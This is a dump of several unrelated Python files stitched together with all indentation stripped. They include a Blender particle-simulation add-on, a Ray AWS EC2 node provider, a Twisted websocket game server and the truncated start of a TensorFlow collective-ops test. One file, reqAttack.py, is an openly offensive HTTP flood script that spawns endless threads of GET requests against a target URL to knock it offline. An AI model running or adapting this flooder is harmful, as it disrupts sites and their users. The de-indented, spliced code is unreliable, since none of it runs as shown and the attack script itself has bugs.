import random
import time
ts = time.time()
time1 = 0
time2 = 0
time3 = 0
for _ in range(2):
num_samples = 640
batch_length = random.randint(200, 400)
selected = random.sample(feats_scp, num_samples)
for utt in selected:
_, t1, t2, t3 = read(utt, batch_length, shuffle=True)
time1 += t1
time2 += t2
time3 += t3
te = time.time() - ts
print("Total time: %f s, time 1: %f s, time 2: %f s, time 3: %f s" % (te, time1, time2, time3))
|
operators.py
|
# standart modules
import threading
import struct
import os
# blender modules
import bpy
import bmesh
# addon modules
import taichi as ti
import numpy as np
from .engine import mpm_solver
from . import types
from . import particles_io
from . import nodes
WARN_SIM_NODE = 'Node tree must not contain more than 1 "Simulation" node.'
WARN_NOT_SIM_NODE = 'Node tree does not have "Simulation" node.'
mpm_solver.USE_IN_BLENDER = True
IMPORT_NODES = (
'elements_particles_mesh_node',
'elements_particles_system_node'
)
# sim_node - simulation node
def get_cache_folder(operator, sim_node):
# particles socket
par_s = sim_node.outputs['Simulation Data']
cache_nodes = []
has_cache_node = False
if par_s.is_linked:
for link in par_s.links:
# disk cache node
disk = link.to_node
if disk.bl_idname == nodes.ElementsCacheNode.bl_idname:
cache_nodes.append(disk)
if not len(cache_nodes):
operator.is_finishing = True
operator.report(
{'WARNING'},
'Node tree does not have "Cache" node.'
)
return None, has_cache_node
elif len(cache_nodes) > 1:
operator.is_finishing = True
operator.report(
{'WARNING'},
'Node tree must not contain more than 1 "Cache" node.'
)
return None, has_cache_node
else:
cache_node = cache_nodes[0]
has_cache_node = True
folder_raw = cache_node.inputs['Folder'].get_value()[0]
folder = bpy.path.abspath(folder_raw)
return folder, has_cache_node
# get simulation nodes tree object
def get_tree_obj(node_tree):
# simulation nodes tree object
tree = types.Tree()
for node in node_tree.nodes:
if node.bl_idname == 'elements_simulation_node':
tree.sim_nds[node.name] = node
elif node.bl_idname in IMPORT_NODES:
if node.bl_idname == 'elements_particles_system_node':
import_type = 'PAR_SYS'
elif node.bl_idname == 'elements_particles_mesh_node':
import_type = 'PAR_MESH'
node.get_class()
tree.imp_nds[node.name] = node, import_type
elif node.bl_idname == 'elements_cache_node':
tree.cache_nds[node.name] = node
return tree
def create_emitter(operator, solv, emitter, vel):
# source object
src_obj = emitter.source_object
if not src_obj:
operator.is_finishing = True
operator.report(
{'WARNING'},
'Emmiter not have source object.'
)
return
obj_name = src_obj.obj_name
obj = bpy.data.objects.get(obj_name)
if not obj:
operator.is_finishing = True
if not obj_name:
operator.report(
{'WARNING'},
'Emmiter source object not specified.'
)
else:
operator.report(
{'WARNING'},
'Cannot find emmiter source object: "{}".'.format(obj_name)
)
return
if obj.type != 'MESH':
operator.is_finishing = True
operator.report(
{'WARNING'},
'Emmiter source object is not mesh: "{}".'.format(obj.name)
)
return
if not emitter.material:
operator.is_finishing = True
operator.report(
{'WARNING'},
'Emmiter not have material.'
)
return
if not len(obj.data.polygons):
operator.is_finishing = True
operator.report(
{'WARNING'},
'Emmiter source object not have polygons: "{}"'.format(obj.name)
)
return
b_mesh = bmesh.new()
b_mesh.from_mesh(obj.data)
bmesh.ops.triangulate(b_mesh, faces=b_mesh.faces)
# emitter triangles
tris = []
for face in b_mesh.faces:
# triangle
tri = []
# v - bmesh vertex
for v in face.verts:
# final vertex coordinate
v_co = obj.matrix_world @ v.co
tri.extend(v_co)
tris.append(tri)
b_mesh.clear()
tris = np.array(tris, dtype=np.float32)
# material type
mat = emitter.material.typ
# taichi material
ti_mat = mpm_solver.MPMSolver.materials.get(mat, None)
if ti_mat is None:
assert False, mat
# emitter particles color
red = int(emitter.color[0].r * 255) << 16
green = int(emitter.color[0].g * 255) << 8
blue = int(emitter.color[0].b * 255)
color = red | green | blue
# add emitter
solv.add_mesh(
triangles=tris,
material=ti_mat,
color=color,
velocity=vel,
emmiter_id=operator.emitter_indices[emitter]
)
return True
class ELEMENTS_OT_SimulateParticles(bpy.types.Operator):
bl_idname = "elements.simulate_particles"
bl_label = "Simulate"
device: bpy.props.EnumProperty(
name='Device',
default='cpu',
items=(
('gpu', 'GPU', 'Run on GPU, automatically detect backend'),
('cuda', 'CUDA', 'Run on GPU, with the NVIDIA CUDA backend'),
('opengl', 'OpenGL', 'Run on GPU, with the OpenGL backend'),
('metal', 'Metal', 'Run on GPU, with the Apple Metal backend, if you are on macOS'),
('cpu', 'CPU', 'Run on CPU (default)')
)
)
device_memory_fraction: bpy.props.FloatProperty(
name='Device Memory',
default=50.0,
min=10.0,
max=100.0,
subtype='PERCENTAGE'
)
def __init__(self):
self.timer = None
self.thread = None
self.is_runnig = False
self.is_finishing = False
self.event_type = 'DEFAULT'
def create_emitters(self, frame):
for emitter in self.emitters:
if len(emitter.velocity) == 1:
vel = emitter.velocity[0]
else:
vel = emitter.velocity[frame]
if emitter.typ == 'EMITTER':
if emitter.emit_frame[0] == frame:
correct_emmiter = create_emitter(self, self.solv, emitter, vel)
if not correct_emmiter:
return self.cancel(bpy.context)
elif emitter.typ == 'INFLOW':
if type(emitter.enable) == float:
enable = emitter.enable
else:
if len(emitter.enable) == 1:
index = 0
else:
index = frame
enable = bool(int(round(emitter.enable[index], 0)))
if enable:
correct_emmiter = create_emitter(self, self.solv, emitter, vel)
if not correct_emmiter:
return self.cancel(bpy.context)
return True
def save_particles(self, frame, np_x, np_v, np_color, np_material, np_emitters):
if not os.path.exists(self.cache_folder):
os.makedirs(self.cache_folder)
# file name
fname = 'particles_{0:0>6}'.format(frame)
# particle file path
pars_fpath = os.path.join(self.cache_folder, fname)
# particles data
par_data = {
particles_io.POS: np_x,
particles_io.VEL: np_v,
particles_io.COL: np_color,
particles_io.MAT: np_material,
particles_io.EMT: np_emitters,
}
data = particles_io.write_pars_v1(par_data, pars_fpath, fname)
with open(pars_fpath + '.bin', 'wb') as file:
file.write(data)
write_obj = False
if write_obj:
with open(pars_fpath + '.obj', 'w') as f:
for i in range(pars_cnt):
x = np_x[i]
print(f'v {x[0]} {x[1]} {x[2]}', file=f)
def run_sim(self):
# self.frame_end + 1 - this means include the last frame in the range
for frame in range(self.frame_start, self.frame_end + 1, 1):
if self.event_type == 'ESC':
print('STOP SIMULATION')
self.thread = None
self.is_finishing = True
self.cancel(bpy.context)
return
print('Frame: {}'.format(frame))
is_correct = self.create_emitters(frame)
if not is_correct is True:
return self.cancel(bpy.context)
# generate simulation state at t = 0
# particles
pars = self.solv.particle_info()
np_x = pars['position']
np_v = pars['velocity']
np_material = pars['material']
np_color = pars['color']
np_emitters = pars['emitter_ids']
# and then start time stepping
self.solv.step(1 / self.fps)
print(np_x)
self.save_particles(
frame,
np_x,
np_v,
np_color,
np_material,
np_emitters
)
def init_sim(self):
# simulation nodes
sim = []
for node in self.node_tree.nodes:
if node.bl_idname == 'elements_simulation_node':
sim.append(node)
if not len(sim):
self.report({'WARNING'}, WARN_NOT_SIM_NODE)
self.is_finishing = True
return self.cancel(bpy.context)
elif len(sim) > 1:
self.report({'WARNING'}, WARN_SIM_NODE)
self.is_finishing = True
return self.cancel(bpy.context)
else:
inputs = sim[0].inputs
self.scene.elements_frame_start = inputs['Frame Start'].get_value()[0]
self.scene.elements_frame_end = inputs['Frame End'].get_value()[0]
self.is_runnig = True
self.scene.elements_nodes.clear()
tree = get_tree_obj(self.node_tree)
# simulation nodes count
sim_nodes_cnt = len(tree.sim_nds)
if sim_nodes_cnt != 1:
if sim_nodes_cnt > 1:
self.report({'WARNING'}, WARN_SIM_NODE)
self.is_finishing = True
return
sim = list(tree.sim_nds.values())[0]
if not sim:
return self.cancel(bpy.context)
sim.get_class()
# simulation class
cls, _ = self.scene.elements_nodes[sim.name]
self.cache_folder, has_cache_node = get_cache_folder(self, sim)
if not has_cache_node:
return self.cancel(bpy.context)
if not self.cache_folder and has_cache_node:
self.report({'WARNING'}, 'Cache folder not specified')
self.is_finishing = True
return self.cancel(bpy.context)
self.frame_start = cls.frame_start[0]
self.frame_end = cls.frame_end[0]
self.fps = cls.fps[0]
# TODO: list is not implemented
if not cls.solver:
self.report(
{'WARNING'},
'Node tree does not have "MPM Solver" node.'
)
self.is_finishing = True
return {'FINISHED'}
res = cls.solver.resolution[0]
size = cls.solver.size[0]
ti.reset()
arch = getattr(ti, self.device)
mem = self.device_memory_fraction / 100
ti.init(arch=arch, device_memory_fraction=mem)
print(f"Creating simulation of res {res}, size {size}")
solv = mpm_solver.MPMSolver(
(res, res, res),
size=size,
unbounded=True,
use_emitter_id=True
)
solv.set_gravity(tuple(cls.gravity[0]))
self.emitters = cls.emitters
if not self.emitters:
self.report({'WARNING'}, 'Node tree not have emitters.')
self.is_finishing = True
return self.cancel(bpy.context)
self.emitter_indices = {}
for index, emitter in enumerate(self.emitters):
self.emitter_indices[emitter] = index
if cls.colliders:
for collider in cls.colliders:
direct = collider.direction[0]
if not direct[0] and not direct[1] and not direct[2]:
direct = (0, 0, 1)
frict = collider.friction[0]
if frict < 0:
frict = 0
elif frict > 1:
frict = 1
solv.add_surface_collider(
tuple(collider.position[0]),
tuple(direct),
surface=collider.surface,
friction=frict
)
self.size = size
self.solv = solv
self.run_sim()
def launch_sim(self):
self.thread = threading.Thread(target=self.init_sim, args=())
self.thread.start()
def modal(self, context, event):
if event.type == 'ESC':
self.event_type = 'ESC'
if not self.is_runnig:
self.launch_sim()
if self.is_finishing:
self.cancel(context)
return {'FINISHED'}
return {'PASS_THROUGH'}
def execute(self, context):
self.node_tree = context.space_data.node_tree
self.scene = context.scene
context.window_manager.modal_handler_add(self)
win = context.window
self.timer = context.window_manager.event_timer_add(1.0, window=win)
return {'RUNNING_MODAL'}
def cancel(self, context):
if self.timer:
context.window_manager.event_timer_remove(self.timer)
self.timer = None
self.thread = None
self.is_finishing = True
def invoke(self, context, event):
wm = context.window_manager
return wm.invoke_props_dialog(self)
# operators draw function
def op_draw_func(self, context):
if context.space_data.node_tree:
if context.space_data.node_tree.bl_idname == 'elements_node_tree':
self.layout.operator('elements.simulate_particles')
self.layout.operator('elements.stable_render_animation')
class ELEMENTS_OT_StableRenderAnimation(bpy.types.Operator):
bl_idname = 'elements.stable_render_animation'
bl_label = 'Render'
bl_description = 'Stable Render Animation'
@classmethod
def poll(cls, context):
# space data
spc_data = context.space_data
if spc_data.node_tree:
return spc_data.node_tree.bl_idname == 'elements_node_tree'
def execute(self, context):
scn = context.scene
rend = scn.render
rend.image_settings.file_format = 'PNG'
# output folder
out = rend.filepath
for frm in range(scn.frame_start, scn.frame_end + 1):
file_name = '{0:0>4}.png'.format(frm)
file_path = os.path.join(bpy.path.abspath(out), file_name)
if rend.use_overwrite or not os.path.exists(file_path):
print('Render Frame:', frm)
scn.frame_set(frm)
bpy.ops.render.render(animation=False)
for image in bpy.data.images:
if image.type == 'RENDER_RESULT':
image.save_render(file_path, scene=scn)
bpy.data.images.remove(image)
return {'FINISHED'}
operator_classes = [
ELEMENTS_OT_SimulateParticles,
ELEMENTS_OT_StableRenderAnimation
]
def register():
for operator_class in operator_classes:
bpy.utils.register_class(operator_class)
def unregister():
for operator_class in reversed(operator_classes):
bpy.utils.unregister_class(operator_class)
|
node_provider.py
|
import random
import copy
import threading
from collections import defaultdict
import logging
import boto3
import botocore
from botocore.config import Config
from ray.autoscaler.node_provider import NodeProvider
from ray.autoscaler.aws.config import bootstrap_aws
from ray.autoscaler.tags import TAG_RAY_CLUSTER_NAME, TAG_RAY_NODE_NAME, \
TAG_RAY_LAUNCH_CONFIG, TAG_RAY_NODE_TYPE, TAG_RAY_INSTANCE_TYPE
from ray.ray_constants import BOTO_MAX_RETRIES, BOTO_CREATE_MAX_RETRIES
from ray.autoscaler.log_timer import LogTimer
logger = logging.getLogger(__name__)
def to_aws_format(tags):
"""Convert the Ray node name tag to the AWS-specific 'Name' tag."""
if TAG_RAY_NODE_NAME in tags:
tags["Name"] = tags[TAG_RAY_NODE_NAME]
del tags[TAG_RAY_NODE_NAME]
return tags
def from_aws_format(tags):
"""Convert the AWS-specific 'Name' tag to the Ray node name tag."""
if "Name" in tags:
tags[TAG_RAY_NODE_NAME] = tags["Name"]
del tags["Name"]
return tags
def make_ec2_client(region, max_retries, aws_credentials=None):
"""Make client, retrying requests up to `max_retries`."""
config = Config(retries={"max_attempts": max_retries})
aws_credentials = aws_credentials or {}
return boto3.resource(
"ec2", region_name=region, config=config, **aws_credentials)
class AWSNodeProvider(NodeProvider):
def __init__(self, provider_config, cluster_name):
NodeProvider.__init__(self, provider_config, cluster_name)
self.cache_stopped_nodes = provider_config.get("cache_stopped_nodes",
True)
aws_credentials = provider_config.get("aws_credentials")
self.ec2 = make_ec2_client(
region=provider_config["region"],
max_retries=BOTO_MAX_RETRIES,
aws_credentials=aws_credentials)
self.ec2_fail_fast = make_ec2_client(
region=provider_config["region"],
max_retries=0,
aws_credentials=aws_credentials)
# Try availability zones round-robin, starting from random offset
self.subnet_idx = random.randint(0, 100)
self.tag_cache = {} # Tags that we believe to actually be on EC2.
self.tag_cache_pending = {} # Tags that we will soon upload.
self.tag_cache_lock = threading.Lock()
self.tag_cache_update_event = threading.Event()
self.tag_cache_kill_event = threading.Event()
self.tag_update_thread = threading.Thread(
target=self._node_tag_update_loop)
self.tag_update_thread.start()
# Cache of node objects from the last nodes() call. This avoids
# excessive DescribeInstances requests.
self.cached_nodes = {}
def _node_tag_update_loop(self):
"""Update the AWS tags for a cluster periodically.
The purpose of this loop is to avoid excessive EC2 calls when a large
number of nodes are being launched simultaneously.
"""
while True:
self.tag_cache_update_event.wait()
self.tag_cache_update_event.clear()
batch_updates = defaultdict(list)
with self.tag_cache_lock:
for node_id, tags in self.tag_cache_pending.items():
for x in tags.items():
batch_updates[x].append(node_id)
self.tag_cache[node_id].update(tags)
self.tag_cache_pending = {}
for (k, v), node_ids in batch_updates.items():
m = "Set tag {}={} on {}".format(k, v, node_ids)
with LogTimer("AWSNodeProvider: {}".format(m)):
if k == TAG_RAY_NODE_NAME:
k = "Name"
self.ec2.meta.client.create_tags(
Resources=node_ids,
Tags=[{
"Key": k,
"Value": v
}],
)
self.tag_cache_kill_event.wait(timeout=5)
if self.tag_cache_kill_event.is_set():
return
def non_terminated_nodes(self, tag_filters):
# Note that these filters are acceptable because they are set on
# node initialization, and so can never be sitting in the cache.
tag_filters = to_aws_format(tag_filters)
filters = [
{
"Name": "instance-state-name",
"Values": ["pending", "running"],
},
{
"Name": "tag:{}".format(TAG_RAY_CLUSTER_NAME),
"Values": [self.cluster_name],
},
]
for k, v in tag_filters.items():
filters.append({
"Name": "tag:{}".format(k),
"Values": [v],
})
nodes = list(self.ec2.instances.filter(Filters=filters))
# Populate the tag cache with initial information if necessary
for node in nodes:
if node.id in self.tag_cache:
continue
self.tag_cache[node.id] = from_aws_format(
{x["Key"]: x["Value"]
for x in node.tags})
self.cached_nodes = {node.id: node for node in nodes}
return [node.id for node in nodes]
def is_running(self, node_id):
node = self._get_cached_node(node_id)
return node.state["Name"] == "running"
def is_terminated(self, node_id):
node = self._get_cached_node(node_id)
state = node.state["Name"]
return state not in ["running", "pending"]
def node_tags(self, node_id):
with self.tag_cache_lock:
d1 = self.tag_cache[node_id]
d2 = self.tag_cache_pending.get(node_id, {})
return dict(d1, **d2)
def external_ip(self, node_id):
node = self._get_cached_node(node_id)
if node.public_ip_address is None:
node = self._get_node(node_id)
return node.public_ip_address
def internal_ip(self, node_id):
node = self._get_cached_node(node_id)
if node.private_ip_address is None:
node = self._get_node(node_id)
return node.private_ip_address
def set_node_tags(self, node_id, tags):
with self.tag_cache_lock:
try:
self.tag_cache_pending[node_id].update(tags)
except KeyError:
self.tag_cache_pending[node_id] = tags
self.tag_cache_update_event.set()
def create_node_of_type(self, node_config, tags, instance_type, count):
assert instance_type is not None
node_config["InstanceType"] = instance_type
return self.create_node(node_config, tags, count)
def get_instance_type(self, node_config):
return node_config["InstanceType"]
def create_node(self, node_config, tags, count):
# Always add the instance type tag, since node reuse is unsafe
# otherwise.
tags = copy.deepcopy(tags)
tags[TAG_RAY_INSTANCE_TYPE] = node_config["InstanceType"]
# Try to reuse previously stopped nodes with compatible configs
if self.cache_stopped_nodes:
filters = [
{
"Name": "instance-state-name",
"Values": ["stopped", "stopping"],
},
{
"Name": "tag:{}".format(TAG_RAY_CLUSTER_NAME),
"Values": [self.cluster_name],
},
{
"Name": "tag:{}".format(TAG_RAY_NODE_TYPE),
"Values": [tags[TAG_RAY_NODE_TYPE]],
},
{
"Name": "tag:{}".format(TAG_RAY_INSTANCE_TYPE),
"Values": [tags[TAG_RAY_INSTANCE_TYPE]],
},
{
"Name": "tag:{}".format(TAG_RAY_LAUNCH_CONFIG),
"Values": [tags[TAG_RAY_LAUNCH_CONFIG]],
},
]
reuse_nodes = list(
self.ec2.instances.filter(Filters=filters))[:count]
reuse_node_ids = [n.id for n in reuse_nodes]
if reuse_nodes:
logger.info("AWSNodeProvider: reusing instances {}. "
"To disable reuse, set "
"'cache_stopped_nodes: False' in the provider "
"config.".format(reuse_node_ids))
for node in reuse_nodes:
self.tag_cache[node.id] = from_aws_format(
{x["Key"]: x["Value"]
for x in node.tags})
if node.state["Name"] == "stopping":
logger.info("AWSNodeProvider: waiting for instance "
"{} to fully stop...".format(node.id))
node.wait_until_stopped()
self.ec2.meta.client.start_instances(
InstanceIds=reuse_node_ids)
for node_id in reuse_node_ids:
self.set_node_tags(node_id, tags)
count -= len(reuse_node_ids)
if count:
self._create_node(node_config, tags, count)
def _create_node(self, node_config, tags, count):
tags = to_aws_format(tags)
conf = node_config.copy()
# Delete unsupported keys from the node config
try:
del conf["Resources"]
except KeyError:
pass
tag_pairs = [{
"Key": TAG_RAY_CLUSTER_NAME,
"Value": self.cluster_name,
}]
for k, v in tags.items():
tag_pairs.append({
"Key": k,
"Value": v,
})
tag_specs = [{
"ResourceType": "instance",
"Tags": tag_pairs,
}]
user_tag_specs = conf.get("TagSpecifications", [])
# Allow users to add tags and override values of existing
# tags with their own. This only applies to the resource type
# "instance". All other resource types are appended to the list of
# tag specs.
for user_tag_spec in user_tag_specs:
if user_tag_spec["ResourceType"] == "instance":
for user_tag in user_tag_spec["Tags"]:
exists = False
for tag in tag_specs[0]["Tags"]:
if user_tag["Key"] == tag["Key"]:
exists = True
tag["Value"] = user_tag["Value"]
break
if not exists:
tag_specs[0]["Tags"] += [user_tag]
else:
tag_specs += [user_tag_spec]
# SubnetIds is not a real config key: we must resolve to a
# single SubnetId before invoking the AWS API.
subnet_ids = conf.pop("SubnetIds")
for attempt in range(1, BOTO_CREATE_MAX_RETRIES + 1):
try:
subnet_id = subnet_ids[self.subnet_idx % len(subnet_ids)]
logger.info("NodeProvider: calling create_instances "
"with {} (count={}).".format(subnet_id, count))
self.subnet_idx += 1
conf.update({
"MinCount": 1,
"MaxCount": count,
"SubnetId": subnet_id,
"TagSpecifications": tag_specs
})
created = self.ec2_fail_fast.create_instances(**conf)
for instance in created:
logger.info("NodeProvider: Created instance "
"[id={}, name={}, info={}]".format(
instance.instance_id,
instance.state["Name"],
instance.state_reason["Message"]))
break
except botocore.exceptions.ClientError as exc:
if attempt == BOTO_CREATE_MAX_RETRIES:
logger.error(
"create_instances: Max attempts ({}) exceeded.".format(
BOTO_CREATE_MAX_RETRIES))
raise exc
else:
logger.error(exc)
def terminate_node(self, node_id):
node = self._get_cached_node(node_id)
if self.cache_stopped_nodes:
if node.spot_instance_request_id:
logger.info(
"AWSNodeProvider: terminating node {} (spot nodes cannot "
"be stopped, only terminated)".format(node_id))
node.terminate()
else:
logger.info(
"AWSNodeProvider: stopping node {}. To terminate nodes "
"on stop, set 'cache_stopped_nodes: False' in the "
"provider config.".format(node_id))
node.stop()
else:
node.terminate()
self.tag_cache.pop(node_id, None)
self.tag_cache_pending.pop(node_id, None)
def terminate_nodes(self, node_ids):
if not node_ids:
return
if self.cache_stopped_nodes:
spot_ids = []
on_demand_ids = []
for node_id in node_ids:
if self._get_cached_node(node_id).spot_instance_request_id:
spot_ids += [node_id]
else:
on_demand_ids += [node_id]
if on_demand_ids:
logger.info(
"AWSNodeProvider: stopping nodes {}. To terminate nodes "
"on stop, set 'cache_stopped_nodes: False' in the "
"provider config.".format(on_demand_ids))
self.ec2.meta.client.stop_instances(InstanceIds=on_demand_ids)
if spot_ids:
logger.info(
"AWSNodeProvider: terminating nodes {} (spot nodes cannot "
"be stopped, only terminated)".format(spot_ids))
self.ec2.meta.client.terminate_instances(InstanceIds=spot_ids)
else:
self.ec2.meta.client.terminate_instances(InstanceIds=node_ids)
for node_id in node_ids:
self.tag_cache.pop(node_id, None)
self.tag_cache_pending.pop(node_id, None)
def _get_node(self, node_id):
"""Refresh and get info for this node, updating the cache."""
self.non_terminated_nodes({}) # Side effect: updates cache
if node_id in self.cached_nodes:
return self.cached_nodes[node_id]
# Node not in {pending, running} -- retry with a point query. This
# usually means the node was recently preempted or terminated.
matches = list(self.ec2.instances.filter(InstanceIds=[node_id]))
assert len(matches) == 1, "Invalid instance id {}".format(node_id)
return matches[0]
def _get_cached_node(self, node_id):
"""Return node info from cache if possible, otherwise fetches it."""
if node_id in self.cached_nodes:
return self.cached_nodes[node_id]
return self._get_node(node_id)
def cleanup(self):
self.tag_cache_update_event.set()
self.tag_cache_kill_event.set()
@staticmethod
def bootstrap_config(cluster_config):
return bootstrap_aws(cluster_config)
|
reqAttack.py
|
import requests
import random
import threading
import sys
VERSION='2.0'
url=sys.argv[0]
socket_ip=[]
user_agent=[]
request_counters=0
def user_agents():
user_agent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
user_agent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
user_agent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
def request_attack():
random_agents=random.choice(user_agent)
headers={'User-Agent':random_agents}
requests.get(url)
def send():
for i in range(sys.argv[1]):
get_attack=threading.Thread(target=request_attack)
get_attack.start()
while True:
if threading.active_count() < sys.argv[1]:
get_attack=threading.Thread(target=request_attack)
get_attack.start()
user_agents()
send()
|
websocket.py
|
from pdb import set_trace as T
import numpy as np
from signal import signal, SIGINT
import sys, os, json, pickle, time
import threading
import ray
from twisted.internet import reactor
from twisted.internet.task import LoopingCall
from twisted.python import log
from twisted.web.server import Site
from twisted.web.static import File
from autobahn.twisted.websocket import WebSocketServerFactory, \
WebSocketServerProtocol
from autobahn.twisted.resource import WebSocketResource
class GodswordServerProtocol(WebSocketServerProtocol):
def __init__(self):
super().__init__()
print("Created a server")
self.frame = 0
#"connected" is already used by WSSP
self.sent_environment = False
self.isConnected = False
self.pos = [0, 0]
self.cmd = None
def onOpen(self):
print("Opened connection to server")
def onClose(self, wasClean, code=None, reason=None):
self.isConnected = False
print('Connection closed')
def connectionMade(self):
super().connectionMade()
self.factory.clientConnectionMade(self)
def connectionLost(self, reason):
super().connectionLost(reason)
self.factory.clientConnectionLost(self)
self.sent_environment = False
#Not used without player interaction
def onMessage(self, packet, isBinary):
print("Server packet", packet)
packet = packet.decode()
_, packet = packet.split(';') #Strip headeer
r, c, cmd = packet.split(' ') #Split camera coords
if len(cmd) == 0 or cmd == '\t':
cmd = None
self.pos = [int(r), int(c)]
self.cmd = cmd
self.isConnected = True
def onConnect(self, request):
print("WebSocket connection request: {}".format(request))
realm = self.factory.realm
self.realm = realm
self.frame += 1
def serverPacket(self):
data = self.realm.packet
return data
def sendUpdate(self, data):
packet = {}
packet['resource'] = data['resource']
packet['player'] = data['player']
packet['npc'] = data['npc']
packet['pos'] = data['pos']
packet['wilderness'] = data['wilderness']
config = data['config']
print('Is Connected? : {}'.format(self.isConnected))
if not self.sent_environment:
packet['map'] = data['environment']
packet['border'] = config.TERRAIN_BORDER
packet['size'] = config.TERRAIN_SIZE
if 'overlay' in data:
packet['overlay'] = data['overlay']
print('SENDING OVERLAY: ', len(packet['overlay']))
packet = json.dumps(packet).encode('utf8')
self.sendMessage(packet, False)
class WSServerFactory(WebSocketServerFactory):
def __init__(self, ip, realm):
super().__init__(ip)
self.realm = realm
self.time = time.time()
self.clients = []
self.pos = [0, 0]
self.cmd = None
self.tickRate = 0.6
self.tick = 0
def update(self, packet):
self.tick += 1
uptime = np.round(self.tickRate*self.tick, 1)
delta = time.time() - self.time
print('Wall Clock: ', str(delta)[:5], 'Uptime: ', uptime, ', Tick: ', self.tick)
delta = self.tickRate - delta
if delta > 0:
time.sleep(delta)
self.time = time.time()
for client in self.clients:
client.sendUpdate(packet)
if client.pos is not None:
self.pos = client.pos
self.cmd = client.cmd
return self.pos, self.cmd
def clientConnectionMade(self, client):
self.clients.append(client)
def clientConnectionLost(self, client):
self.clients.remove(client)
class Application:
def __init__(self, realm):
signal(SIGINT, self.kill)
log.startLogging(sys.stdout)
port = 8080
self.factory = WSServerFactory(u'ws://localhost:{}'.format(port), realm)
self.factory.protocol = GodswordServerProtocol
resource = WebSocketResource(self.factory)
root = File(".")
root.putChild(b"ws", resource)
site = Site(root)
reactor.listenTCP(port, site)
def run():
reactor.run(installSignalHandlers=0)
threading.Thread(target=run).start()
def update(self, packet):
return self.factory.update(packet)
def kill(*args):
print("Killed by user")
reactor.stop()
os._exit(0)
|
collective_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.experimental.ops import testing as dataset_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
all_reduce = _collective_ops.all_reduce
all_gather = _collective_ops.all_gather
broadcast_send = _collective_ops.broadcast_send
broadcast_recv = _collective_ops.broadcast_recv
class CollectiveOpsV2(object):
@staticmethod
def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def broadcast_send(t, shape, dtype, group_size, group_key, instance_key,
*args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.broadcast_send_v2(t, group_size, group_key,
instance_key, *args, **kwargs)
@staticmethod
def broadcast_recv(shape, dtype, group_size, group_key, instance_key, *args,
**kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
shape = array_ops.identity(shape)
return _collective_ops.broadcast_recv_v2(
shape, dtype, group_size, group_key, instance_key, *args, **kwargs)
device_combination = (
combinations.combine(device='CPU', communication='RING', required_gpus=0) +
combinations.combine(
device='GPU', communication=['RING', 'NCCL'], required_gpus=2))
collective_op_combinations = combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce', CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather', CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination)
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v1', CollectiveOpsV1),
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
def testGather(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
